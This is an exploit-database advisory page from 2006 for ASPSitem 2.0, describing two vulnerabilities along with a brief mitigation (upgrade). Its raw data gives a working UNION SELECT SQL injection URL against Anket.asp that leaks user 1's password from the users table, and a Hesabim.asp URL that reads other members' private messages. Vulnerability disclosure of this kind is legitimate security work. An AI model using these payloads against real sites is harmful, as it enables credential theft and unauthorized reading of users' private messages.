header-logo
Suggest Exploit
vendor:
ASPSitem
by:
nukedx.com & milw0rm.com
7.5
CVSS
HIGH
SQL Injection & Read Others Private Messages
89
CWE
Product Name: ASPSitem
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ASPSitem <= 2.0 Multiple Vulnerabilities

This exploits works on ASPSitem <= 2.0. An attacker can use a SQL injection to leak userid 1's login information from the database. An attacker can also read others private messages by using the URL http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername.

Mitigation:

Upgrade to the latest version of ASPSitem.
Source

Exploit-DB raw data:

ASPSitem <= 2.0 Multiple Vulnerabilities.
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on ASPSitem <= 2.0.
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login information from database.
Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]